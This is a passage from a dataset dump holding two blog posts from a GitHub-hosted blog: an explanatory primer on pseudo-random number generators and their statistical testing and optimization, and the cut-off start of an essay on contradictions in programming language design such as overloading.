\"datePublished\": \"2022-01-27T16:36:40Z\",\n \"keywords\": \"julia, rust, optimization\" }\n</script>\n"
},
{
"alpha_fraction": 0.7627834677696228,
"alphanum_fraction": 0.7747005820274353,
"avg_line_length": 61.89483642578125,
"blob_id": "9ee9c0eac657da4c4f23ea7cfd4c71c20179e93b",
"content_id": "6e3036b88e472fafa5b75bde52106fa733762dad",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 33162,
"license_type": "no_license",
"max_line_length": 765,
"num_lines": 523,
"path": "/blog/src/a-primer-on-randomness.md",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "# A Primer On Randomness\n\nLast October, during a one-week hiking holiday in the birthplace of alpinism,\nI got particularly interested in random generators.\n\nFour reasons why they are fascinating:\n\n1. It is only once you track it that you realize just in which gargatuan proportions you **exude information**. Even tiny systems that encode very little data and whose entire purpose is to never leak it (ie, random generators), do so in ways that can be measured, and even exploited. In every instant of your life, during every interaction with someone, billions of muscle movements, tiny and large, only occur because of past events burnt into your brain’s circuits, and betray this private history. Given enough of it, an aggregator could rewind the world and extract minute details from the past.\n2. All of **symmetric cryptography** completely hinges on randomness. Security proofs fully rely on the analysis of how little information you can extract from a stream, which requires the stream to effectively look random.\n3. Studying them, and trying your hand at making them, helps you understand the **scientific method** better. Most real-world principles can never be proved with absolute certainty; you need to accurately detect a signal in the noise, and measure the likelihood that this signal is not just you seeing patterns in the static.\n4. Finally, it helps both understand **the virtue of mixing**, and how best to stir. The effect of mixing is exponential, which is unnatural to mentally harness. On the plus side, when done well, you get fluid exchange of information, remix, and cultural explosion. On the minus side, you get COVID-19 everywhere. Striking the right balance gets you far: many optimizing algorithms rely on it such as genetic algorithms, stochastic gradient descent, or cross-validation sampling in machine learning, which each are heavy users of pseudo-random sources. The results speak for themselves: AlphaGo, for instance, beat the best human player at one of the hardest games on Earth, using Monte-Carlo Tree Search. Yes, you guessed it, they call it Monte Carlo for a reason.\n\n## Information Theory\n\nA good Pseudo-Random Number Generator (or PRNG for short) is indistinguishable from a true random output.\n\n*So, where do we get this true random output you speak of?*\n\nTrue randomness has statistical meaning, but it is impossible to prove or disprove.\nYou can only have a high confidence.\n\nYou might hope that true randomness can be extracted from nature, but that is also not true.\nThe physical realm contains a large quantity of data storage (“space”),\nand laws that alter it: gravity, electromagnetism, …\nNature is a state transition function and an output; that is also the structure of a PRNG.\n\nPhysical processes that claim to output “true” randomness rely on the large amount of information stored in the environment, and that environment’s diffuse state scrambling, that is presumably extremely hard for an attacker to detect.\n\nFor instance, the fine trajectory of electrons attracted from atom to atom through an electrical circuit causing minuscule delays, or the chaotic motion of gaseous atoms, or stronger yet, quantum behavior of particles. \n\nSome physicists may argue that the world is not fully deterministic.\nHowever, the Copenhagen Interpretation or Multiverse fans\ncannot disprove the possibility of a non-local world that complies with the Bell-EPR paradox,\nfor instance through superdeterminism or pilot waves.\n(Sorry for those that don’t care about quantum mechanics;\nyou don’t need to understand this paragraph to carry on.)\n\nSince true randomness is not real, how do we get close?\n\nLet’s say that you generate bits. If all the bits were `1`, it would be pretty predictable, right?\nSo the frequency of ones should converge to one out of two, which is what probability half is.\n\nBut if the output was a one followed by a zero continuously (`101010…`), it would be predictable too!\nSo the frequency of the sequence `10` in the output should converge to one out of four.\n\nMore generally, every possible sequence of `n` bits should appear with a frequency converging to `1÷2ⁿ`.\n\n(A common romanticization of that idea is the comment that the decimals of π encode the entire works of Shakespeare.\nπ being irrational, its formulation is [orthogonal to any fractional representation][Weyl], which is what decimals are.\nThat gives strong credence to the conjecture that its digits form a truly random sequence.)\n\nThat idea might make you uneasy. After all, it gives an impossible requirement on the memory size of a generator.\n\n### Memory\n\nIf your state contains `i` bits, what is the largest sequence of consecutive ones it can output?\n\nWell, since the PRNG is deterministic, a given state will always yield the same output.\nThere are `2ⁱ` possible state configurations, so with this entropy, you can at best output `i·2ⁱ` bits\nbefore you arrive at a previous state and start repeating the same output sequence again and again.\n\nAt least, with an ideal PRNG, you know that one given configuration will output a sequence of `i` ones.\nThe previous configuration (which transitioned to the configuration that outputs the `i` ones)\ncannot also output a sequence of `i` ones:\nif two configurations yielded the same output, then there would be some `i`-bit output that no configuration produced.\nThat would not be an ideal PRNG.\n\nSo let’s say that the previous configuration gives `i-1` ones (a zero followed by a ton of ones),\nand that the next configuration gives `i-1` ones (a ton of ones followed by a zero).\nThat is a total of a maximum of `3×i-2` consecutive ones.\n\nThus, you cannot get `3×i-1` consecutive ones…\nwhich a true random generator would output with a frequency of `1 ÷ 2^(3×i-1)`.\nA statistical deviation that you can detect to disprove that a generator is truly random!\n\nConversely, it means that *true generators require infinite memory*, which is impossible in the real world.\n\n(By the way, yes, it does seem like computing all the digits of π requires infinite memory.\nAll current algorithms need more memory the more digits are output.)\n\nIn practice, you get around the issue by picking a state size `i` large enough that\ndetecting this statistical anomaly requires a millenia’s worth of random output, too much for anyone to compute.\n\n### Cycle Analysis\n\nSo, once we have picked a state size, now we have an upper bound for the period of the PRNG:\nit will repeat the same sequence at least every `2ⁱ` bits.\n\nBut of course, your mileage may vary. An imperfect generator might have a much lower period.\nUnless you have a mathematical proof for a **lower bound**, maybe your family of generators\nhas a seed (an initialization parameter) which results in the same output being repeated over and over…\nThat is called a fixed point.\n\nEven if there are no fixed point, there could be a large number of seeds that start repeating soon!\n(That was a real [vulnerability in the RC4 cipher][], by the way.)\n\n[vulnerability in the RC4 cipher]: https://www.cs.cornell.edu/people/egs/615/rc4_ksaproc.pdf\n\nOn the plus side, there is a counterintuitive phenomenon that develops\nwhen a set of links randomly connect with each other in closed chains.\nMost links end up on long chains.\nFor instance, with two links, they will be connected in a chain half the time;\nwith three links, each link will be connected to another link with probability ⅔; etc.\n\nBetter yet, if you increase the number of links linearly,\nyou decrease the proportion of links that are part of small chains exponentially.\n\nThe bottom line is this: you can always put lipstick on the pig by increasing the state size,\nand your generator will look good.\n\nHowever, a fundamentally better generator would have become even better yet with an increased state size.\n\n### Reversibility\n\nIf you build out the design at random, a danger lingers.\nUnless you are careful, you might build an irreversible generator.\nGiven a state after a generation,\ncan you mathematically compute the previous state?\n\nIf you can’t,\nthen there are multiple initial states that can transition to the current state.\nThat means some states can never happen,\nbecause there are no initial state that transitions to them;\nthey got stolen by the states with multiple previous states pointing to it!\n\nThat is bad. Why?\n\nFirst, it reduces the potency of your state size\n(since a percentage of possible states are unreachable).\n\nSecond, many seeds merge into the rail tracks of other seeds,\nconverging to a reduced set of possible streams and outputting the same values!\nNot only does this create inter-seed output correlation,\nit also means that *a given stream will likely degrade in period*.\n\n<p><img alt='Irreversible PRNG example.' src='../assets/a-primer-on-randomness/irreversible-prng.svg' width=350px'>\n\nIt could look good for many terabytes, and suddenly reach a fixed point,\nand output the same number over and over.\n\nIn fact, if the states transition to randomly picked states,\nthe average cycle that you eventually get to,\n[loops every 2<sup>(n+1)÷2</sup>][Bob Jenkins talk].\n\n[Bob Jenkins talk]: https://burtleburtle.net/bob/rand/talksmall.html\n\nIf you build a **reversible** algorithm,\nat least all streams are a cycle,\nso inter-seed correlation is not inevitable.\n\nSome streams can have really long cycles.\nBecause they include a lot of states,\na starting seed is more likely to land in a long-cycle state.\nThe average period becomes 2<sup>n-2</sup>, almost the square of the length.\n\n<p><img alt='Reversible PRNG example.' src='../assets/a-primer-on-randomness/reversible-prng.svg' width=350px'>\n\nNote that a reversible design does not mean that the state cycles through all possible combinations.\nIt just means that each state points to exactly one other state, and has exactly one state leading to it.\nIn other words, it is a *bijection*, but not a *circular permutation*.\n\n<p><img alt='Circular permutation example.' src='../assets/a-primer-on-randomness/circular-prng.svg' width=350px'>\n\n### Diffusion\n\nClaude Shannon made [a very good point the other day][Sha45] (I think it was in 1945?) about ciphers.\nAn ideal pseudo-random source is such that any bit of the input flips half the bits of the output.\n\nMore precisely, ideally, the probability that any bit of the stream flips if a given bit of the state flips, should be ½.\nThat is called **diffusion** of the state.\n\nAfter all, if it wasn’t ½, I could start making good guesses about whether this bit of the state is set,\nand slowly recover pieces of the state or even the key.\nAnd suddenly, I can predict the whole stream.\n\nA related concept is **confusion** of the key.\nIdeally, each bit of the output depends equally on a combination of all bits of the key.\nSo, each bit of the key should change each bit of the stream,\nfor half of the set of possible configurations of the key’s other bits.\n\nEach bit of the stream should therefore be a complex combination of all of the key’s bits,\nwhile each bit of the key should have an impact stretched along the whole stream.\n\nThese properties particularly matter for cryptographic primitives such as ChaCha20,\nwhere the seed of the PRNG is essentially the cipher key.\nTheir analysis and understanding still matter for PRNG quality;\nalthough some designs don’t take confusion seriously,\nleading to severe correlation of distinct seeds.\n\n[Weyl]: https://mathworld.wolfram.com/WeylsCriterion.html\n[Sha45]: https://www.iacr.org/museum/shannon/shannon45.pdf\n\n## Tooling\n\nBack in the seventies, there was no tooling to pragmatically study the quality of a generator.\nThat made the PRNG hobby somewhat impractical.\n\nAs a sad result, some people produced subpar results, such as IBM’s infamous [RANDU]:\n\n> It fails the spectral test badly for dimensions greater than 2, and every integer result is odd.\n\nFortunately, great strides were made since.\nAnyone can get going quickly, up until they start having competitive results.\n\n[RANDU]: https://en.wikipedia.org/wiki/RANDU\n\n### History\n\nA first step was Donald Knuth’s description of the use of **Chi-Squared tests** in 1969.\n\nWhile its application to generators was described in Knuth’s seminal work\n*The Art of Computer Programming*, we have to thank Karl Pearson for the concept.\n\nAs the story goes, Pearson was disgruntled at scientists estimating all their results\nbased on the assumption that their statistical distributions were always normal,\nwhen in some cases they very clearly were not. They just didn’t really have any other tool.\n\nSo he worked through the theory. Say you make a claim that some value, for which you have samples,\nfollows a given statistical distribution. (A uniform one perhaps? Like our PRNG outputs?)\nCall that “**the Null Hypothesis**”, because it sounds cool.\n\nYour evidence is a set of samples that belong in various categories.\nYour null hypothesis is the belief that each category `i ∈ {1,…,k}` appears with probability `pᵢ`.\nMaybe the two classes are 0 and 1; maybe they are the 256 possible bytes.\n\nThere are `oᵢ` *observed* samples in category `i`.\nThe theoretical, *expected* number of samples should be `eᵢ` = `n·pᵢ`.\nYou compute the **Chi-Squared statistic**: `χ²` = `Σ (eᵢ - oᵢ)² ÷ eᵢ`.\n\nThat statistic follows a distribution of probabilities,\ndepending on the degrees of freedom of the problem at hand.\nIf we are looking at random bytes, each generation must be one of 256 possible outputs:\nso there are 255 degrees of freedom.\n(If it is not in the first 255, it must be in the last, so the last one is not a degree of freedom.)\n\n\n\nEach possible value of `χ²` you get has a probability of being valid for your null hypothesis.\nOne value is the most probable one. The further you get from it, the least likely it is that your samples are random.\n\nBut by how much?\n\nYou want to know the probability that a true random generator’s `χ²` lands\nas far from the ideal value as your pseudo-random generator did.\n(After all, even a perfect generator rarely precisely lands on the most probable `χ²`,\nwhich for random bytes is 253 with probability 1.8%.)\n\nYou can compute the probability that a true random generator’s `χ²` is bigger (more extreme) than yours.\nThat probability is called a **p-value**.\nIf it is tiny, then it is improbable that a true random generator would get this value;\nand so, it is improbable that what you have is one.\n\n\n\nWith this tool in hand, you can easily check that a process that pretends to be random is not actually so.\n\nOr, as [Pearson puts it][Pearson]:\n\n> From this it will be more than ever evident how little chance had to do\n> with the results of the Monte Carlo roulette in July 1892.\n\n(Not sure why his academic paper suddenly becomes so specific;\nmaybe he had a gambling problem on top of being a well-known racist.)\n\nFun sidenote: if you look at the `χ²` formula, notice that if your observed values all hit their expectations,\nyou will always end up with a `χ²` equal to zero, whose p-value is 1.\n\nUniform random numbers have this awesome property that their p-values should also be uniformly random,\nand the p-values of the p-values too, and so on.\n\nThe p-value you want is simply one that is not too extreme (eg, higher than 10¯⁵, lower than 1-10¯⁵).\nA p-value of 1 immediately disqualifies your null hypothesis!\nPerfect fits are not random; you must have anomalies some of the time.\n\nLet’s get back to Donald Knuth. His advice of using this tool to study pseudo-random efforts defined all subsequent work.\n\nIn 1996, another PRNG fellow, George Marsaglia, looked at the state of tooling with discontent.\nSure, those Chi-Squared tests were neat.\nBut writing them by hand was tedious.\n\nWorse, nothing defined what to observe. Bytes are one thing, but they only detect byte-wise bias.\nWhat about bitwise? What if we count bits, and compare that count to a *Known Statistic* (**bit counting**)?\nWhat if we count the number of successive times one byte is bigger than the one generated just before (**runs test**)?\nOr maybe count the number of outputs between the appearance of the same value (**gap test**)?\nOr take a random matrix, compute its rank, verify that it validates the *Known Statistic* (**binary rank**)?\n\nWell, he didn’t think about all those tests,\nbut he did publish a software package that automatically computed p-values\nfor a dozen of tests. He called it *DIEHARD*.\n\nSome are like the ones I described, some are a bit wilder and somewhat redundant,\nsome have a bit too many false positives to be relied upon.\n\nBut it was the start of automation!\n\nAnd the start of the systematic extermination of the weak generators.\n\nIn 2003, Robert G. Brown extended it with an easy-to-use command-line interface, *[Dieharder]*,\nthat allowed testing without having to fiddle with compilation options, just by piping data to a program.\nHe aggregated a few tests from elsewhere, such as the NIST’s STS\n(which are surprisingly weak for their cryptographic purpose… Those were simpler times.)\n\nA big jump in quality came about in 2007.\nPierre L’Écuyer & Richard Simard published *[TestU01]*, a test suite consisting of three bars to clear.\n\n- SmallCrush picks 10 smart tests that killed a number of weak generators in 30 seconds.\n- Crush was a very intensive set of 96 tests that killed even more weaklings, but it took 1h to do so.\n- BigCrush was the real monster. In 8 hours, its set of 106 tests brutalizes 8 TB of output, betraying subtler biases never before uncovered, even in many previously-beloved PRNGs, such as the still-popular Mersenne Twister. A very sobering moment.\n\nTestU01 installed two fresh ideas: having multiple levels of intensity, and parameterizing each test.\nThe latter in particular really helped to weed out bad generators.\nMaybe if you look at all the bits, they look fine, but if you look at every eigth bit, maybe not so much?\n\nThe feel of using the programs was still similar, though: you ran the battery of tests,\nyou waited eight hours, and at the end, you were shown the list of all tests whose p-value was too extreme.\n\nThence came the current nec-plus-ultra: Chris Doty-Humphrey’s *Practically Random*,\naffectionately called [PractRand], published in 2010.\n\nIt was a step up still from TestU01:\n\n- Instead of eating one output for one test and throwing it away, it uses output for multiple tests, and even overlaps the same test families along the stream, maximizing the extraction of statistics from each bit of output.\n- It took the concept of levels of intensity to a new level. The program technically never stops; it continuously eats more random data until it finds an unforgivable p-value. On paper, it is guaranteed to find one, at least once it reaches the PRNG’s cycle length; but that assumes you have enough memory for it to store its statistics. In practice, you can go very far: for instance, the author’s own sfc16 design reached flaws after 512 TiB — which took FOUR MONTHS to reach!\n- It displays results exponentially. For instance, once at 1 MB of random data read, then at 2, then at 4, then at 8, … Every time, it either tells you that there are no anomalies, or the list of tests with their bad p-values.\n\n*(A small note: don’t expect this tooling to be satisfactory for anything cryptographic.\nTheir study relies on much more advanced tooling and analysis pertaining to diffusion,\ndifferential cryptanalysis, algebraic and integral attacks.)*\n\nI am a big believer in tooling.\nI believe it is THE great accelerator of civilization by excellence.\nThe step that makes us go from running at 30 km/h, to speeding at 130 km/h, to rocketing at 30 Mm/h.\nIn fact, by the end of this series of posts, I hope to publish one more tool to add to the belt.\n\n[Pearson]: http://www.economics.soton.ac.uk/staff/aldrich/1900.pdf\n[ent]: https://www.fourmilab.ch/random/\n[Dieharder]: https://webhome.phy.duke.edu/~rgb/General/dieharder.php\n[TestU01]: http://simul.iro.umontreal.ca/testu01/tu01.html\n[PractRand]: http://pracrand.sourceforge.net/\n \n### Hands-On\n\nI don’t actually recommend you start out with PractRand for the following reasons:\n\n- You might make silly mistakes. PractRand can kill generators that looked OK in the 80s fairly instantly. You won’t know if your design didn’t even stand a chance back then, or if it was competitive.\n- You might have a coding bug. It would be too bad if you threw away a good starting design just because a mask had the wrong bit flipped.\n- Seeing Chi-Square failures helps understand the beginner design space. Yes, you want the output to have high entropy; but while it is obvious that you don’t want a poorly balanced output (eg. one possible sequence appears too often), you also don’t want a highly structured output (eg. all possible sequences appear exactly as often), since random noise must contain anomalies. Seeing a high-entropy generator fail because bytes were slightly too equiprobable helped me appreciate what was undesirable. It is often counter-intuitive, so these beginner lessons help a lot.\n\nI would encourage you to build a silly idea, then pipe 10 MB to [ent].\nCheck the entropy calculation (it should be somewhere around 7.9999),\nand verify that the Chi-Square p-value is between 0.1% and 99.9% with a set of seeds.\n\nCompare it to a good randomness source: `</dev/urandom head -c 10M | ent`.\n(When I say good, I mean ChaCha20, which is what Linux uses.)\n\nSee what happens when you go from 10M to 100M: does the p-value always decrease, or always increase?\nThat would be bad, very bad indeed.\n\nOnce your Chi-Squared is good, skip all the old tests, and hop into PractRand: `./prng | RNG_test stdin64`.\nI recommend specifying the size of your output, so that PractRand can know what to look out for.\n\nThen, goes the contest.\n\nIf you pass 1 MiB: you have beat the sadly very widely-used [drand48]! (Java, C, …)\n\nIf you pass 256 GiB: you are now better than the widely-used [Mersenne Twister]! (Ruby, Python, …)\n\nIf you pass 1 TiB: congratulations, you beat the famous [RC4] stream cipher!\n(Used as macOS’s old arc4random source, and actually most websites used it for TLS at some point…)\n\nIf you pass 32 TiB: you have won. The `RNG_test` program automatically stops.\nBeware: it takes about a week to compute… when your generator is fast.\n\nQuick advice: remember that p-values should be uniformly random.\nIt is inevitable to have some of them be labeled “unusual”, or even, more rarely, “suspicious”.\nIt does not mean you failed.\n\nWhen the p-value is too extreme, PractRand will show “FAIL!” with a number of exclamation marks proportional to how horrified it is.\nThen, the program will stop immediately.\n\nSome tests will fail progressively.\nIf the same test shows “unusual” at 4 GiB, and “suspicious” at 8 GiB,\nit will probably fail at 16 GiB.\n\n### Speed\n\nOnce you beat 32 TiB of PractRand, you know your generator is good —\nbut to be useful, it also must be the fastest in its class.\n\nA few notes can really help you get it up to speed.\n\nFirst, pick your target platform.\n\nYou will need different optimization tricks if you build for `x86_64`\n(Intel / AMD), or for ARM (phones),\nor if you directly target a CMOS integrated circuit,\nif you want to burn your PRNG in an ASIC.\n\nLet’s say you want to get the most out of your Intel or AMD chip.\nGo as close to the metal as you can. Code in C, C++, or Rust.\n\nSecond, understand the assembly output. Looking at the compiled assembly with `gcc prng.c -S -o prng.asm` can help.\nI recommend [Intel’s introduction], [AMD’s manual] and [Agner’s instruction tables].\n\nIn particular, a number of amd64 opcodes are inaccessible from the programming language.\nYou can access them in various ways:\n\n- The compiler will smartly use them when they apply. For instance, there is an opcode to rotate the bits of a variable leftward: `ROL`. But all the C programming language offers is shift (`>>` for `SHR`, `<<` for `SHL`). However, the compiler will map `(a << 1) | (a >> 63)` to the 64-bit `ROL`.\n- Compilers usually include header files or libraries to access those instructions, by exporting functions that compile down to the corresponding instruction. Those are called **[intrinsics]**. For instance, our friend the 64-bit `ROL` appears as `_rotl64(a, 1)`, if you `#include <immintrin.h>`.\n- SIMD operations heavily depend on your mastery of the compiler. You can either access them through assembly, compiler flags, or intrinsics (my favorite).\n\nThird, understand the way [the CPU processes the assembly][AgnerMicroarchitecture].\n\n- **[Instruction pipelining]**: Every instruction executed goes through a number of phases: \n ① the instruction is decoded from memory and cut in micro-operations (μops); \n ② each μop is assigned internal input and output registers; \n ③ the μop reads input registers; \n ④ it is executed; \n ⑤ it writes to the output register; and finally \n ⑥ the output register is written to the target register or memory. \n Each of those stages start processing the next instruction as soon as they are done with the previous one, without waiting for the previous instruction to have cleared all steps. As a result, a good number of instructions are being processed at the same time, each being in a different stage of processing. \n *Example gain: successive instructions go faster if each stage of the second one does not depend on the first one’s later stages.*\n- **Superscalar execution**: Each μop can be executed by one of multiple execution units; two μops can be executed by two execution units in parallel as long as they don’t have inter-dependencies. There might be one execution unit with logic, arithmetic, float division, and branches; one execution unit with logic, arithmetic, integer and float multiplication; two with memory loads; one with memory stores; one with logic, arithmetic, SIMD permutations, and jumps. Each have a different combination of capabilities. \n *Example gain: adding a second instruction doing the same thing, or something belonging to another unit, may not add latency if it acts on independent data.*\n- **Out-of-order execution**: Actually, after the μop is assigned internal registers, it is queued in a ReOrder Buffer (ROB) which can store about a hundred. As soon as a μop’s input registers are ready (typically because of a read/write constraint: another μop wrote the information that this μop needs to read), it gets processed by the first execution unit that can process it and is idle. As a consequence, the CPU can process instructions 2, 3, etc. while instruction 1 waits on a read/write dependency, as long as the next instructions don’t have read/write dependencies with stalled instructions. \n *Example gain: you can put fast instructions after a slow (or stalled) instruction without latency cost, if they don’t depend on the slow instruction’s output.*\n- **Speculative execution**: When there is a branch (eg. an if condition), it would be awful if the whole out-of-order instruction pipeline had to stop until the branch opcode gave its boolean output. So the CPU doesn’t wait to know if the branch is taken: it starts processing the instructions that come after the branch opcode. Once it gets the branch opcode output, it tracks all μops that wrongly executed, and reverts all their work, rewrites the registers, etc.\n- **Branch prediction**: To get the best out of speculative execution, CPUs make guesses as to what the boolean output of a branch is going to be. It starts executing the instructions it believes will occur. \n *Example gain: make your branches nearly always take the same path. It will minimize branch mispredictions, which avoids all the reverting work.*\n\nFinally, beware of the way you test performance. A few tips:\n\n1. Use the `RDTSC` CPU opcode to count cycles, as below.\n2. Disable CPU frequency variability. CPUs nowadays have things like Turbo Boost that change your frequency based on how hot your processor gets and other factors. You want your CPU to have a fixed frequency for the whole process.\n3. Have as few other processes running as possible. If a process runs in the background, eating CPU, it will affect the results.\n\n```\n#include <x86intrin.h>\n\nint main() {\n __int64_t start = _rdtsc();\n generate_one_gigabyte();\n __int64_t cycles = _rdtsc() - start;\n fprintf(stderr, \"%f cpb\\n\", ((double)cycles) / 1073741824);\n}\n```\n\n[Intel’s introduction]: https://software.intel.com/en-us/articles/introduction-to-x64-assembly\n[AMD’s manual]: https://www.amd.com/system/files/TechDocs/24592.pdf\n[Agner’s instruction tables]: https://www.agner.org/optimize/instruction_tables.pdf\n[intrinsics]: https://software.intel.com/sites/landingpage/IntrinsicsGuide/\n[AgnerMicroarchitecture]: https://www.agner.org/optimize/microarchitecture.pdf\n[Instruction pipelining]: https://software.intel.com/en-us/blogs/2011/11/22/pipeline-speak-learning-more-about-intel-microarchitecture-codename-sandy-bridge\n\n### Designs\n\nThe earliest design is the **LCG** (Linear Congruent Generator).\nYou can recognize its dirt-simple state transition (a constant addition or multiplication),\nwhich has neat consequences on the analysis of its cycle length (typically 2^statesize).\nUsually, the output is treated with a shift or rotation before delivery.\nWhile they look fairly random, they can have severe issues, such as hyperplane alignment.\nThey also tend to be easy to predict once you reverse-engineer them,\nwhich is why they are not used for anything remotely in need of security.\n\nExamples of LCG abound: [drand48], [Lehmer128], [PCG], …\n\nThen come **Shufflers** (eg. [RC4], [ISAAC], [EFIIX]).\nUsually have an “I” in the name (standing for “indirection”).\nThey try to get randomness by shuffling a list, and they shuffle the list from the randomness they find.\nDo not recommend. It is so easy for bias to seep through and combine destructively.\nBesides, weeding out bad seeds is often necessary.\n\n**Mixers** rely on a simple transition function,\nusually addition to what is sometimes called a “gamma” or “[Weyl coefficient][Weyl]”.\nA common non-cryptographic pattern is a state multiplication, just like in LCG,\nand the output is XORed with a shifted or rotated version of itself before delivery.\nThe second step is basically a hash.\n(To the security-minded readers: I am not talking about collision-resistant compression functions.)\nIn cryptography, usually, the mixer uses some ARX combination for bit diffusion (ARX = Add, Rotate, XOR),\nand is scheduled in multiple rounds (which are basically skipping outputs).\nExamples include [wyrand], [SplitMix], [Xorshift128+], [AES-CTR], and the beloved [ChaCha20].\n\nFinally, the most haphazard of them: **chaotic generators**.\nThey typically have no minimal cycle length, and they just try to stir things up in the state.\nFor instance, [jsf] and [Romu].\n\n[Mersenne Twister]: http://www.math.sci.hiroshima-u.ac.jp/~m-mat/MT/emt.html\n[drand48]: http://man7.org/linux/man-pages/man3/drand48.3.html\n[Lehmer128]: https://lemire.me/blog/2019/03/19/the-fastest-conventional-random-number-generator-that-can-pass-big-crush/\n\n[RC4]: https://cypherpunks.venona.com/archive/1994/09/msg00304.html\n[ISAAC]: http://burtleburtle.net/bob/rand/isaacafa.html\n[EFIIX]: http://pracrand.sourceforge.net/RNG_engines.txt\n[PCG]: https://www.pcg-random.org/\n[SplitMix]: http://gee.cs.oswego.edu/dl/papers/oopsla14.pdf\n[Xorshift128+]: http://vigna.di.unimi.it/ftp/papers/xorshiftplus.pdf\n[AES-CTR]: https://nvlpubs.nist.gov/nistpubs/FIPS/NIST.FIPS.197.pdf\n[ChaCha20]: https://cr.yp.to/chacha/chacha-20080128.pdf\n[wyrand]: https://github.com/wangyi-fudan/wyhash\n[jsf]: https://burtleburtle.net/bob/rand/smallprng.html\n[Romu]: http://www.romu-random.org/\n\n## Parting Fun Facts\n\nI mentionned ChaCha20 a lot, because it is one of my favorite cryptographic primitives.\nI’ll give you a few fun facts about it, as goodbye.\n\n1. ChaCha20 [initializes its state][Salsa20] with the ASCII for “expand 32-byte k”. It’s a wink on the purpose of the cipher: it takes a 256-bit key, and expands it to a large random stream.\n2. It is based on the design of [a joke cipher that plays on a US law][djb export] cataloguing encryption as munition, except if it is a hash. He built it as a simple construction on top of a carefully-constructed hash. Calling the core construction a hash caused him trouble later as [reviewers misunderstood it][salsa hash].\n3. The initial name of that cipher was Snuffle. (Yes.)\n\n[Salsa20]: https://cr.yp.to/snuffle/salsafamily-20071225.pdf\n[djb export]: https://cr.yp.to/export/1996/0726-bernstein.txt\n[salsa hash]: https://cr.yp.to/snuffle/reoncore-20080224.pdf\n\n[Find comments on Reddit](https://www.reddit.com/r/prng/comments/fpy6pg/a_primer_on_randomness/).\n\n<script type=\"application/ld+json\">\n{ \"@context\": \"http://schema.org\",\n \"@type\": \"BlogPosting\",\n \"datePublished\": \"2020-03-27T15:17:57Z\",\n \"keywords\": \"prng, crypto\" }\n</script>\n"
},
{
"alpha_fraction": 0.7719755172729492,
"alphanum_fraction": 0.7773147821426392,
"avg_line_length": 58.527130126953125,
"blob_id": "625ad268178da74483071b0ab9b6f52c2442da80",
"content_id": "b67a63a8d0c35b354b5cfbd37410424701efac37",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 7681,
"license_type": "no_license",
"max_line_length": 353,
"num_lines": 129,
"path": "/blog/src/language-contradictions.md",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "# Language Contradictions\n\nNobody notices how absurd programming languages are until you try and build a new one.\n\nCat-and-mouse questions spring everywhere. Here's a few.\n\nOverloading\n-----------\n\nBack in the 1960s, overloading meant overhead for compiler writers, so they threw it out of their language. Back then, floating-point implemented in hardware was still a thing! Then came Ada and C++, which featured function overloading. For completeness' sake, C++ added operator overloading. After all, operators behave much like functions, don't they?\n\nDo you want overloading?\n\nThis question is still relevant today. Proof is, the Go language [forbids it](http://golang.org/doc/go_faq.html#overloading). How old is Go? It was unveiled in 2008. Bummer.\n\nThe thing is, overloading takes a lot of language constructs for granted.\nYou cannot have overloading without types and functions.\nThose are pretty common, but that condemns languages such as Lisp, JavaScript, Python and Lua from ever overloading anything.\nRather, since those languages have weak typing, all functions are systematically overloaded to all existing types.\nHowever, if you *do* want the behaviour of your function to match the type of your parameters, you have two choices:\n\n- You can, C-style, create functions with different names. What a wonderful world!\nNow you have two problems. What naming rule to follow?\nLisp has those weird `string-` functions (such as `string-equal`)\nwhich both look ugly and are harder to find, for they stack up real fast.\n- You can construct your only function in a `switch` fashion.\nYou check for the type of the parameter, and you have one code block for each choice.\nOf course, this option is unacceptable.\nWhat if you define a brand new type?\nYou would have to modify the source files of such fundamental functions as `equal`.\nNo, this is bad.\n(Yet such bright examples as [SICP itself](http://mitpress.mit.edu/sicp/full-text/book/book-Z-H-26.html#%_sec_4.1) showcase an `eval` function with a huge type check at its core, hence forbidding the creation of new types.)\n\nAt least, the limited possibilities of C makes this choice simple.\nYou have to create a new name. Yet, you have a single namespace.\nYou are effectively out of luck.\n\nLook at [those pretty algorithms](http://shootout.alioth.debian.org/u64q/program.php?test=pidigits&lang=gcc&id=4), filled with `mpz_add(tmp2, tmp2, numer)` instead of `+` and `mpz_cmp(tmp2, denom)` instead of `<`.\n\nI once read a blog post that Brendan Eich pointed to. The author was very unhappy with this kind of syntax in Java. One of the commenters told the amazing story of some Wall Street code that contained `BigDecimal total = new BigDecimal( subA.doubleValue() + subB.doubleValue() );`. The + in there could have been the doom of mankind.\n\nWhile C had an excuse (it was created at a prehistoric time), Go deserves some spite. They argue that…\n\n> Experience with other languages told us that having a variety of methods with the same \n> name but different signatures was occasionally useful but that it could also be \n> confusing and fragile in practice.\n\nOh, boy. Do they really believe that?\n\nI'll tell you what. This is all nonsense.\nIntegers are a type. Floating-point numbers are a different type.\nYou can use the `+` operator with both.\nAll operators are effectively deeply overloaded, even in C, even in Go.\nIs *that* so confusing? If so, take a page from Caml's book. Caml has distinct operators for floating-point arithmetic.\n\n----\n\nJava, on the other hand, argues that overloading is good, because using different names for things that do the exact same thing on slightly different types is silly at best. On the other hand, *operator overloading* is deemed bad.\n\nRight. You can remember that *methods* have multiple meanings, but not *operators*. \nBesides, `x.Add(Number.ONE).Mult(y)` is sooo much prettier.\n\nJava is partially wrong. (I guess I'll surprise some readers with this assertion. What? Java isn't *completely* wrong for once?)\n\nLet me state why Java is wrong first.\n\nOverloading being good has nothing to do with types being very similar (ie, on the same type hierarchy branch).\nOverloading should sometimes be applied to types which are miles away from each other.\nOverloading allows a namespace mechanism. A function named `draw` can either paint a shape, or remove a certain amount from an account.\n\nOn the other hand, Java is right that overloading operators isn't the same.\nUntil now, I've implicitly assumed that operators behave like functions, but unless you are using Lisp, this simply isn't true.\nNonetheless, they could have allowed overloading, with a word of warning etched beneath in the brightest red: BEWARE OF THE PRECEDENCE!\n\nPrecedence\n----------\n\nAll modern programming languages have built-in types.\n\nAll modern programming languages allow users to define their own types.\n\nThere should be nothing special between the former and the latter. Yet, there is.\n\nPython has had this issue for quite some time, wherein builtin types did not behave like user-defined classes.\nYou could not subclass a builtin type, for instance.\nThey strove to [fix this](http://www.python.org/dev/peps/pep-0253/).\nThey were right. Why should the user expect builtins to be more important than the code *they* write?\nWhy should their types be second-class?\n\nJava was strongly overwhelmed by 